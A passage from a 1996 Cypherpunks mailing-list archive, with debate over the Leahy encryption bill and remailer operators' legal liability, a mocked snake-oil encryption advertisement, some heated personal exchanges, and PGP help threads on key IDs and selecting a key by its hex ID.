_THEY_ try to be imaginative, "pushing the envelope" as it were, and expect 
the courts to stop them.  Sadly, those same courts often have ex-prosecutors 
as judges, people who aren't particularly inclined to dissuade the abuse of 
laws.  (exceptions exist, obviously.)

>At the same time am pragmatic enough to accept the idea that it will have
>no effect unless it passes and to be passed today it must have something
>like the criminalization statement.

I've occasionally seen statements like this, but the people who make these 
claims never seem to back them up with reasoned commentary, let alone facts, 
which would help to establish that this particular section is a "must" to any 
particular supporter, certainly not a substantial number of supporters of 
this bill.  Even a quote or two from some political-type saying, "We need 
that section to pass this bill" would be better than nothing.   

I'm not suggesting this is totally implausible; merely that it would be 
lunacy to _assume_ that the bill "needs" this clause to pass, without more 
evidence or even opinion expressed by key people.  It's almost as if you 
people have surrendered before the "fight" even has begun.  _NOW_ do you 
understand why I'm so astonished at your reaction to this bill?

Tim May would object to my use of the word, "Sheeple" here, but I think it 
fits absolutely.  Anybody who would allow himself to be spoon-fed this 
_entire_, unrepaired bill _IS_ a "sheeple."  Anyone who invents some 
requirement that this bad section be in place is WORSE.

Furthermore, if any people (for example, Senators and Representatives) 
actually are willing to publicly stand up and insist on that section, then 
I'd say that's a cue for us to ask them some very hard questions.  You seem 
to be unwilling to put them to their proof.  I recommend that you stop 
living DOWN to your reputation, Padgett.

> The goal here should not be to throw
>it out since that would simply cause the whole bill to fail,

Again, you do NOTHING to support this claim.  How do you KNOW this to be 
true?  And even with that knowledge, presuming you have it, why are you  
apparently not planning to use it to our best advantage?  Why not try to 
"smoke out" some of the people who have conspired to include this section 
into the law?  I'll bet they're hoping nobody questions them on their 
motivations!

Moreover, does this comment indicate that you've had conversations or seen 
information that indicates that the presence of this part of the bill is 
necessary to its passage?  And you're not TELLING US the details of that 
conversation or information?  Suggesting that you're happy to sell the rest 
of us out?   Hmmmmmm?  Or are you just jumping to a conclusion?  Padgett, 
the more you say the more you destroy your credibility.

> but to word
>it carefully enough that it satisfies those who reguire laws

Huh?!?  Who "require[s] laws"?????????   _I_ certainly don't "require" this 
section to be there, and so far I haven't seen anyone on CP who _personally_ 
would insist on the presence of this section to condition his support the 
entire bill.  Quite the opposite; most people express varying degrees of 
reservations about it.  


> while being narrow enough to avoid exploitation. IMNSHO the best way to do 
that is to
>require that: 
>1) A felony occured (curiously misdemeanors were ommitted) 
>   and
>2) That the individual to be charged was an active participant (before,
>        during, or after the fact) 

The problem is, what is your definition of the words, "active participant"?  
And will YOUR definition actually be the one included in the law?

I, on the other hand, see no reason to add crimes, since the implication 
above is that the person involved is ALREADY prosecutable in court.  Why all 
this "piling on"?

On the contrary, I believe it is absolutely certain that this clause will be 
used to prosecute people who are not otherwise prosecutable or convictable 
of any other crime.  It's curious that you don't see that.

>   and
>3) That encryption was used in furtherance.
>
>Note: that in the US (1) and (2) seem sufficient for a criminal charge to be 
>brought, so does (3) really add anything except words or possibly severity ?

I sure wish you were better at answering your own questions...


>Seizure seems to be a great concern of the group with the point of the
>Bemmis Pontiac being brought up. For someone providing a free remailer,
>that is a valid concern since the first question a court might ask is
>"what was the motivation". I suspect that someone providing a remailer
>and charging a reasonable fee to all who might want to use the service
>might be in a much better position (not a lawyer so not allowed to know). 


Playing into their hands yet again, I see!  Raising the price is merely a 
diluted form of banning, BTW.  So far, people implement remailers because 
running them is a comparatively minor cost, and they feel that there is a 
need for those services.  If there was some sort of de-facto rule that the 
operator had to charge for those services, this would complicate the use of 
anonymous remailers even more, deter their use even further, and achieve the 
government's ends just about as surely as a downright ban would do.

In fact, accepting a fee might actually INCREASE the liability of the 
operator, not reduce it, because the remailer operator would have a 
financial stake in the use of his remailer.  He could no longer argue that 
he did not "benefit" from the abuse (use) of that remailer.

>One indicator might be easy to check: Has there ever been a seizure 
>involving a rental car (Hertz, Avis, etc.) and if so, what was the 
>disposition ?

Well, given the fact that these auto-rental companies do billions of dollars 
of business each year and are known and "loved" by one and all, you could 
not use the (supposed) fact that no such incident occurred as some sort of 
positive sign.   Any prosecutor is well aware that he may need a rental car 
some day, and angering a multi-billion dollar company is not something you 
do lightly.

OTOH, if you discover that EVEN THESE organizations are liable for the 
transgressions of their renters, either civilly or criminally, that should 
give you fair warning that anyone smaller (especially an individual running 
a remailer) and less able to defend himself is certainly going to be a 
target eventually.

Even a failed attempt to get a car rental company to be liable for something 
done by a renter is a sign that prosecutor was inclined to go after a big 
target, suggesting he wouldn't think twice before he tried to haul an 
individual into court.  Do you think a person would operate a remailer if he 
thought it was likely he'd get prosecuted and have to pay thousands of 
dollars in legal bills, even if he were eventually acquitted?  Remember, his 
legal bills won't be reimbursed by the government, though I believe they 
should be.

Too bad you can't see this, huh?


Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 01:15:33 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy Bill a Move to Slow Crypto Exports as Much as Possible
Message-ID: <m0twEuJ-00092TC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:34 AM 3/11/96 -0800, Timothy C. May wrote:

>I was more thinking about "novel" applications: things related to digital
>cash, remailers, information markets, etc. These are things which are at a
>nascent stage, and nearly any of them can stalled for export by citing the
>absence of comparable competitors in Europe and Asia.
>
>Hence my concern that the clause is effectively an excuse for delaying
>crypto for as long as is practically possible. Not much of an improvement
>over what we have now--though established companies will no doubt be happy
>because they can export their fairly boring apps--and the new
>criminalization of crypto (when connected with any of the other thousands
>of felony-class crimes, such as swearing) is a step backward.
>
>--Tim May


You're exactly correct, here, Tim.  (I realize that you may not necessarily 
welcome an affirmation from me, but you are indeed right about your 
concerns.)  I've chosen to not focus on the export aspects; I'm glad to see 
you are ably raising them as problems.

Jim Bell
jimbell@pacifier.com
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUSWlfqHVDBboB2dAQE7SgQAo5lk3XrbgH9vUQjukZfKhzKTsE9c0pKb
IRj9kzCirfJImb8MhxszevAm/ibGbgZssL2wX4u0osLZiClkwnh12gk39wNMeKuN
K3GTHrzuuk6xKH5cseaHXJcCi1CuiL5bj0KQDDsJnMIgvrlQeE2RnmxLKlJH1ngO
EO6ASNVSXto=
=GepQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Mar 1996 06:49:05 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptographers against cryptography
In-Reply-To: <199603111735.JAA17685@jobe.shell.portal.com>
Message-ID: <199603111828.NAA00776@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> This is the second in a regular series of postings to expose
> cryptographers and cypherpunks who are either lying to us or
> making a very serious mistake in there judgement.

No, this is the umpteenth stupid anonymous denunciation of people who
deserve no such stupidity.

You aren't fit to eat Bruce Schneier or Matt Blaze's toenail
clippings.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Mar 1996 14:40:42 +0800
To: "Peter D. Junger" <cypherpunks@toad.com>
Subject: Re: A lengthy preliminary analysis of the Leahy bill.
Message-ID: <m0twFC8-00094YC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:26 PM 3/11/96 -0500, Peter D. Junger wrote:
>
>This is a preliminary draft of my preliminary analysis of the Leahy
>bill.  In it I am primarily concerned with the affect---if any---of
>that bill on the constitutionally protected freedoms of speech and of
>the press.

[much scary but, sadly, probably accurate concerns deleted for space.]

>   "\S 2804. Unlawful use of encryption to obstruct justice
>
>   "Whoever willfully endeavors by means of encryption to obstruct,
>   impede, or prevent the communication of information in furtherance to
>   a felony which may be prosecuted in a court of the United States, to
>   an investigative or law enforcement officer shall-
>
>     "(1) in the case of a first conviction, be sentenced to imprisonment
>     for not more than 5 years, fined under this title, or both; or
>     "(2) in the case of a second or subsequent conviction, be sentenced
>     to imprisonment for not more than 10 years, fined under this title,
>     or both.
>
>This provision is completely incoherent.  There is no telling how the
>government will interpret it, but at a guess they will use it to make
>people reveal their keys:  ``if you don't tell us your key, we are
>going to charge you with impeding the communication to me of
>information about the felony I am investigating.''


Thank you, Mr. Junger, for your entire analysis, but particularly this 
comment on that atrocious section.   I'm repeating it, because I think it 
bears vast significance to the problems with this bill. 

The bill needs a complete rewrite.  

The one thing that makes me hopeful is the fact that the people around here 
who seem to think that this bill must be accepted as written, with this 
section included, all claim that there is great opposition to it.  If that 
is true, then all I need to do is to convince people who nominally should be 
on "our" side that the bill is bad, as written.  Mr. Junger's careful, 
albeit prelimary analysis does that in spades.


Jim Bell
jimbell@pacifier.com


Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUSagPqHVDBboB2dAQEXpwQAiLfZk/xPqhTI0UNbgAY/oQh7wR5ElRYH
Cb3QZDHGrPmPBF7MZEFW9bL9U+U/33l0kK/q/20vGvLZMFALImcOPgdFjcidjVRA
zqHAHPTnJWsyROJsv1fgO2l6u0QRkONFxT5MF2tyqGp9ArYAOSwZy4NMXgwX4CrM
QnqwvuKnZfU=
=Qm0E
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 13 Mar 1996 01:23:20 +0800
To: tomservo@access.digex.net (Scott Fabbri)
Subject: Re: rhetorical trickery
In-Reply-To: <v02130500ad68b25e6f1a@[205.252.17.19]>
Message-ID: <199603112135.NAA20486@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>A standard attitude among LEOs is: "if you're not guilty of something, what
>are you hiding?" Skilled ones use this lever to get suspects to allow
>searches of their property on the flimsiest of pretenses.

sigh. it seems I am still being misunderstood. 

SO WHAT???

so a nasty policeman thinks I stole something from my grandma.

SO WHAT???

look, in life, if you are someone who can be walked on, it doesn't
take a POLICEMAN to take advantage of your lack of backbone/spine.
you are going to be exploited by a lot of people other than a policeman.
if you don't know your rights, OF COURSE you can be taken advantage
of.

I can't comprehend all this silliness in response to my messages.
"sure, you can do [x], but the police may still SUSPECT YOU". well,
@#%$%^&* so what?!?!? doesn't anyone understand that if we are
in a civilized society, that's completely irrelevant to the law???

>"Innocent until proven guilty" is at best an abstraction to most police.
>Given the amount of time they have per case, on average, they're more
>interested in slorking up whatever evidence they can against a suspect and
>making a bust. Didn't Ed Meese say something along the lines of, "if they
>weren't criminals, they wouldn't be involved with the police"?

but don't you understand? their ATTITUDE is completely irrelevant.
in regard to the law, we are considering only what they have authority
to do. a policeman cannot get a conviction if he breaks the law in
obtaining evidence. this is my basic point. this is a very powerful
factor in favor of anyone who wishes to use cryptography without 
harassment.

now, there are all kinds of cypherpunks who are going to write me
back, because the mere fact that I used the word "police" in this
message, which attracts flames here with approximately the
same magnetism dead carcasses do flies.

my posts are not about Nasty Police Urban Legends about how the Pigs
are oppressors and have done [x] to my friend [y] who did ABSOLUTELY
NOTHING to provoke it.  in fact I am attempting to pierce some of
these Urban Legends of Police Fear, but instead they continue to
pop up around my posts, somewhat spurred by them.

>ObCrypto: Having a fair amount of encrypted stuff around makes any given
>piece stand out less. A couple dozen PGP-encrypted files with names like
>"1994 1040 Schedule A" and "Business Contact List, 1Q 1995" is a hell of a
>lot less suspicious than a single encrypted file called "detonate.pgp." :^)
>
>Furthermore, if they don't believe me and I choose not to give them the
>plaintext, isn't that my Fifth Amendment right? Or has that been waived in
>cyberspace for our convenience?

these are pretty much the point I'm making that is obviously
not making it through to everyone who responds to me.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 12 Mar 1996 14:18:38 +0800
To: cypherpunks@toad.com
Subject: Mile High Snakeoil
Message-ID: <9603111947.AA00418@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


I was flipping through a copy of Spirit, the official magazine of Southwest  
Airlines, while on a flight to Vegas and found a thoroughly enjoyable  
advertisement for a crypto product.  Underlines and emphasis are theirs.

----  Begin Snake-Oil Advertisement  ----

__UNBREAKABLE__ COMPUTER SECURITY AND PRIVACY AT A __BREAKTHROUGH__ LOW PRICE!

Stonewall-Drawbridge - Encryption Sytem

In the face of the increasingly dangerous invasion of professional, business  
and personal privacy, unbreakable computer security at an affordable cost is  
a must.  Lawyers, Accountants, Doctors, other professionals whose stock in  
trade is confidential information are especially vulnerable to malpractice as  
a result of unprotected information.  It is important to deal with this very  
real potetial problem before it becomes a problem.  Every business, every  
individual must also be concerned about computer security.  Encryption can  
now be used to secure everything from credit card numbers to legal documents.  
 Encryption through totally unbreakable Stonewall-Drawbridge is your  
ultimate security blanket.

*Available Only to United States Citizens*

STONEWALL an unbreakable, streaming type algorithm, 100 to 10,000 times  
faster than other encryptions.  Stonewall compresses prior to encryption,  
eliminating the possible invasion of your computer files.  Its key cannot be  
broken except by random chance, once in a million years.  Good for DOS;  
Windows 3-1;  Windows 95 operating systems.....   ......$195

DRAWBRIDGE applies mathematical algorithms to encrypt messages and uses a  
quasi-infinite, one-way transfer to ensure veracity.  Drawbridge uses an  
Infinite Venegere Key (IVK), combined with a one-way private key transfer  
which is impossible to break, except by chance, once in a million years.  It  
also incorporates a forge-proof digital signature for verification and  
authentication insuring absolute transmittal protection.

STONEWALL-DRAWBRIDGE ENCRYPTION SYSTEM provides unbreakable security  
protection for your "need to protect" files, archives and computer to  
computer transmission.  The Stonewall-Drawbridge System is the ultimate  
encryption system, unmatched by anything else available...at a price that is  
significantly lower than any competitive product.  This means it is  
affordable for every professional, business or individual who needs and seeks  
total and unfailing computer security....especially on the  
Internet.......$295
(includes a second system for your choice of contact)

(800) 610-0859  Mr. Thomas
<order form deleted>
(30 Day Money Back Guarantee)

Make Checks Payable to: HWI
747 E. Green Street, Suite 300, Pasadena , CA 91101-2119

----  End Snake-Oil Advertisement  ----


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Underdog <underdog@netcom.com>
Date: Wed, 13 Mar 1996 06:16:46 +0800
Subject: Re: spy sats
In-Reply-To: <Pine.OSF.3.91.960311114101.21213A-100000@gaston.tenet.edu>
Message-ID: <199603112208.OAA26091@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Tonight on the Discovery Channel at 10 eastern is a program about
> spy satellites.

Speaking of which, a huge car-sized Chinese spy sat is supposed to
crash down sometime tomorrow with a 1 in 300 chance of hitting land.

Joachim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 12 Mar 1996 14:29:59 +0800
To: bdavis@thepoint.net>
Subject: Re: Cut the mystical artist crap. (No crypto relevance here)
In-Reply-To: <Pine.BSF.3.91.960310211211.715B-100000@mercury.thepoint.net>
Message-ID: <MlF7jC200YUuQRXv5t@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 10-Mar-96 Re: Cut the mystical
artist.. by Brian Davis@thepoint.net 
> Thoeau said that "a foolish consistentcy is the hobgoblin of little minds 
> ..."                ^^^^^^^   

*sigh* It was neither:

Ralph Waldo Emerson: "A foolish consistency is the hobgoblin of little
minds, adored by little statesmen and philosophers and divines. With
consistency
a great soul has simply nothing to do."

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Wed, 13 Mar 1996 01:08:17 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptographers against cryptography
Message-ID: <199603112146.OAA25645@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>anonymous-remailer@shell.portal.com writes:
>> This is the second in a regular series of postings to expose
>> cryptographers and cypherpunks who are either lying to us or
>> making a very serious mistake in there judgement.
>
>No, this is the umpteenth stupid anonymous denunciation of people who
>deserve no such stupidity.
>
>You aren't fit to eat Bruce Schneier or Matt Blaze's toenail
>clippings.
>
>Perry

I frequently have a problem with Perry's proprietary and bumptious
mother-hen approach to the c-punks list; in this specific instance, I
applaud his sentiments.

To Mr/Ms/Space Alien (anonymous): It would be nice if you had the decency to
identify yourself, but in any case, please bugger off (and don't keep
pulling out that Thorazine drip connected to your arm).

--Dave Rose





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Mar 1996 13:29:00 +0800
To: cypherpunks@toad.com
Subject: Re: noise levels
In-Reply-To: <199603111905.LAA08069@infinity.c2.org>
Message-ID: <199603111949.OAA03952@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous User writes:
> "Perry E. Metzger" <perry@piermont.com> wrote:
> 
> > Noise levels have been rising fast again. I encourage people to think
> > about whether things are on topic before they post.
> 
> This message is generated as part of an ongoing effort to keep noise off
> of the Cypherpunks mailing list (cypherpunks@toad.com)
> 
> Your message contains no cryptography content.  Please do not post messages
> of this sort to the Cypherpunks mailiing list in the future.

God, you are a jerk, aren't you.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Mar 1996 13:44:10 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <m0twGya-000915C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 3/11/96 -0800, Timothy C. May wrote:
>At 11:12 AM 3/11/96, Gary Howland wrote:
>
>>Dan Weinstein writes:
>
>>> If I rent cars, someone might one day use a car rented from me in a
>>> robbery.  Does that make my an accessary?  NO.
>>
>>This is an unfair analogy.  Now if you had said that you rented cars
>>without asking for proof of identification, thus making your car hire
>>centre very useful to robbers, that may more closely resemble the
>>anon-remailer situation.
>
>If a hotel rents a room to someone who commits a crime in that room, e.g.,
>prostitution, drug use, plotting to blow up a building, can the hotel be
>seized under the asset forfeiture laws?
>Not that I have heard.

Your example is so misleading that it's wrong.  Cities generally attack motels by threatening to pull their licenses, which is usually called an "administrative process" and thus few of the usual protections apply.

>Does it matter if the hotel fails to extensively check identification?
>(Hint: Rarely have I had my ID checked. Sometimes they ask for a driver's
>license and write down the number...and we all know how easy it is to get
>fake DLs. Mostly they don't.)

They do if they've been harassed by the city, for example Portland Oregon to name the closest example I know.

>
>If I lend my chain saw to my next-door neighbor without confirming his
>identity, and he carves up his wife, am I liable? Not in these parts.

"Criminally", probably not.  Civilly, probably if the victim's family has a good enough lawyer.

>(If I lend my chain saw to a ranting, foaming maniac, am I liable? Perhaps.)

Actually, then you're CRIMINALLY liable, as well.


>If I let someone use my telephone without confirming his identity, am I
>liable for crimes committed with this phone?
>This last example is, I submit,  a nearly perfect parallel to anonymous
>remailers. And not because the telephone system is a "common carrier," but
>because of scienter: I have no knowledge, and cannot be expected to have
>knowledge, of crimes committed with my phone.

Actually, that's wrong.  The question will be asked, "Do you regularly lend your phone to strangers who you can't even see, no questions asked, without listening in to see that nothing untoward is being plotted?"  _THAT's_ a more apt analogy.


>If I have visitors at my house, perhaps at a party, and I let a stranger go
>ahead and make a call from the phone in a bedroom, for example, and he
>plans a drug deal, can my house be automatically seized? Not that I have
>ever heard about. 

If your phone was already tapped, and the delivery occurred in your house, you'd better look for new accomodations.

>Maybe so, but if this ever happens, expect an outcry
>against the asset forfeiture laws that will make Linda Thompson's protest
>seem tame.

I prefer not to wait until the Pollyannas of this world have been proven wrong.


>Now if I operate a pay phone and encourage dealers and pimps to use it,
>then maybe the public nuisance, RICO, or "crack house" laws can be used to
>shut it down. (The public nuisance laws are what I would look to to see
>remailers shut down, which will just move them offshore, of course. Absent
>laws about sending encrypted packets outside the country, nothing can be
>done.)

Justa sec:  The Leahy bill makes "encryption furtherance of a felony" 
illegal.  Sending encrypted packets out of the country, containing material 
you don't know (because they're encrypted) sounds like a classic opportunity 
to declare you in violation of some "conspiracy to violate the law" of some 
OTHER country, which is probably considered a Federal felony.

Welcome to prison, Tim.  Your optimism will serve you well, there.

BTW, it is clear that you haven't yet read Mr. Junger's analysis of the 
bill.  Nobody except a government stooge could read that and not wonder why 
anybody would support that bill.  A complete re-write is called for.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 12 Mar 1996 15:50:08 +0800
To: cypherpunks@toad.com
Subject: Re: PGP reveals the key ID of the recipient of encrypted msg
In-Reply-To: <199603110740.IAA06254@storm.certix.fr>
Message-ID: <Pine.LNX.3.91.960311155124.214B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 11 Mar 1996 savron@world-net.sct.fr wrote:

> I began testing PGP  a few days ago ( I'm a PGP newbie ) and I found 
> that it gives out the key ID of an encrypted message . From this you 
> can get the  identification of the recipient of the message , if it's 
> someone who has publicaly  distributed his  key (keyserver , homepage 
> ...) . So even if you are unable to decode the message you  can find 
> who is the recipient of a given message . I think this is a big 
> privacy problem .

The recipient of the message is right in the "To:" header of the message.
If you anonymously remail a message, however, only the last remailer in the
chain will know to whom the message is encrypted, but the last remailer can
also just read the "To:" header.  I don't find this to be a problem at all.

> 
> The problem is carried along when you encrypt a message for multiple  
> recipients , you get the key IDs of all the recipients and same 
> problem as above .  I think something like 'blind email copy' should 
> be used , because the recipients don't have to know the identity of 
> each other .

You could just encrypt a message to different key ID's seperately, rather than
in one pass of PGP.  The would have the effect of Bcc.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUSTJrZc+sv5siulAQHN/QP/ck5/e0+o6HFte49ht2ivN4R/xdL0r5WS
aqWSHq2CO3zxnY1ko76TQ34mA+v6oPGJ8TsfgACsRWzEOOs/8lSwZM93YOIsmrLU
obLgqu9Vgt0jS8l5AEgr82ma7yHzu03LV77jXIuOn+1Amh2uXJtVs66AO5LHbJxn
aBtSPgfCCDY=
=vp/g
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 12 Mar 1996 15:12:50 +0800
To: savron@world-net.sct.fr
Subject: Re: PGP : what to do when a user ID has multiple RSA keys
Message-ID: <2.2.32.19960311235939.008915b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:25 AM 3/11/96 +0000, you wrote:
>My DOS version of PGP 2.6.2 came with a built in PUBRING.PGP 
>containing two keys ( 1024 and 512 size ) with the same user ID .
>For testing  purposes I wanted to encrypt a message with the 512 
>length key , but only the 1024 size key could be used .
>
>How can I select the right key , apart from making a clone 
>PUBRING.PGP with only the key I want to use ?

You need to use the hex id of the key.  (I have this problem as well.)

To get the hex id of the key, try "pgp -kv <yournamehere>".  That will give
you the hex id (right after the key size). 

For example, if -kv returned:

2048/F7D02799

you would use "0xF7D02799" instead of your name.  (No quotes and case does
not matter.)

This does have some Cypherpunks relevence...  Many of the PGP front-ends I
have seen do not use the key ID, and thus, do not pick the correct keys in
this curcumstance.  (And some use it for some, but not all, operations.)

But then, I would like to see key management handled alot differently than
it is now.  (For example, I would like to see PGP use multiple keyrings with
an order of precidence.  Search the most used keyring first and then check
the mega-keyring if nothing is found in the first one.  I expect that kind
of feature is a ways off...)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 13 Mar 1996 16:12:13 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Do you feel lucky, punk?
Message-ID: <m0twHPF-00091DC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:54 PM 3/11/96 -0500, Black Unicorn wrote:
>
>
>[rant including some very dubious abstracts of legal opinions deleted]
>
>Not only is your law poor and badly reasoned,

Just what George Will said about this recent Bennis SC decision.


> your mastery of  the jurisprudence of forfeiture law flawed,

Ditto, and I notice you give no specific examples.  Why is that?


> and your rhetoric twisted, 

Again, you give no specific examples.  And what is "twisted rhetoric", at 
least as you've used it here?

>but you don't seem to know the difference between dicta and holdings.

I didn't use either term.  Neither did George Will.

Maybe you read that item too rapidly to notice that most of it was George 
Will's column, not my wording.  

BTW, I get particularly suspicious when people "respond" 
to my posts and quote NOTHING that I have said.  This seems to be a pattern: 
 The person clearly disagrees with my position in general, but can't cite 
specifics and in fact studiously avoids them.  Padgett Peterson is an expert 
at this, it appears you're trying to emulate him. 

What, then, was the point of sending me the note, as well as wasting 
bandwidth on CP to share your unhappiness?

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Tue, 12 Mar 1996 14:34:22 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: PGP reveals  the key ID of the recipient of encrypted msg
Message-ID: <2.2.32.19960312003621.00b780f4@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain



>At 2:25 3/11/96, savron@world-net.sct.fr wrote:
>
>>I began testing PGP  a few days ago ( I'm a PGP newbie ) and I found
>>that it gives out the key ID of an encrypted message . From this you
>>can get the  identification of the recipient of the message , if it's
>>someone who has publicaly  distributed his  key (keyserver , homepage
>>...) . So even if you are unable to decode the message you  can find
>>who is the recipient of a given message . I think this is a big
>>privacy problem .
>

and "Robert A. Rosenberg" <hal9001@panix.com> replied:

>There is little that can be done about this. There must be something in the
>message to identify who it is intended to be read by. As someone else has
>stated, you can always set up private keys to be used to send to you that
>are different from your Public KeyID for cases where you want to hide your
>identity or that of the party you are communicating with.
>

I can see a case where one would want to broadcast a message (say on usenet)
with *no* indication of the intended recipient (not even a non registered
key-id).  It would seem to be easy enough to hack up something that does not
have key-IDs - to know if it's for you try decryption and if it works then
it was for you.  This does not scale well as the recipient must trial
decrypt all messages which could use *a lot* (tm) of CPU time.

John
John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Tue, 12 Mar 1996 13:26:54 +0800
To: savron@world-net.sct.fr
Subject: Re: PGP : what to do when a user ID has multiple RSA keys
In-Reply-To: <199603110740.IAA06248@storm.certix.fr>
Message-ID: <199603120044.QAA09080@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: savron@world-net.sct.fr]
[cc: cypherpunks@toad.com]
[Subject: Re: PGP : what to do when a user ID has multiple RSA keys ]
[In-reply-to: Your message of Mon, 11 Mar 96 07:25:59 GMT.]
             <199603110740.IAA06248@storm.certix.fr> 

>My DOS version of PGP 2.6.2 came with a built in PUBRING.PGP 
>containing two keys ( 1024 and 512 size ) with the same user ID .
>For testing  purposes I wanted to encrypt a message with the 512 
>length key , but only the 1024 size key could be used .

>How can I select the right key , apart from making a clone 
>PUBRING.PGP with only the key I want to use ?

You can specify by the keyid. Do a pgp -kvv:

	$ pgp -kvv cmca@alpha.c2.org
	Type bits/keyID    Date       User ID
	pub  1024/6C87FFA5 1996/02/06 Chris McAuliffe <cmca@alpha.c2.org>
	1 matching key found.

Now do the encryption
	$ pgp -e 0x6C87FFA5 file

Note the '0x' prefix on the keyid

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMUS+3IHskC9sh/+lAQF8jgP+LdUjgTnfv5k4KsOwEuvPmVsw/V/G3jdD
pyNwOQNtytjSDcGBobspmU4rcx1DObToitJqjzr74G1ytGkrr4wHRS4FWIy3Ea3U
YgrmEhkviJT7B4Ix/vQcrKZJsn2+ZGML6VyVmWr3ehkEMo20UfjIheeTNUSq2OPL
rO9LmZiFyhs=
=MSju
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Tue, 12 Mar 1996 12:02:47 +0800
To: savron@world-net.sct.fr
Subject: Re: PGP : what to do when a user ID has multiple RSA keys
In-Reply-To: <199603110740.IAA06248@storm.certix.fr>
Message-ID: <199603120045.QAA09097@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: savron@world-net.sct.fr]
[cc: cypherpunks@toad.com]
[Subject: Re: PGP : what to do when a user ID has multiple RSA keys ]
[In-reply-to: Your message of Mon, 11 Mar 96 07:25:59 GMT.]
             <199603110740.IAA06248@storm.certix.fr> 

>My DOS version of PGP 2.6.2 came with a built in PUBRING.PGP 
>containing two keys ( 1024 and 512 size ) with the same user ID .
>For testing  purposes I wanted to encrypt a message with the 512 
>length key , but only the 1024 size key could be used .

>How can I select the right key , apart from making a clone 
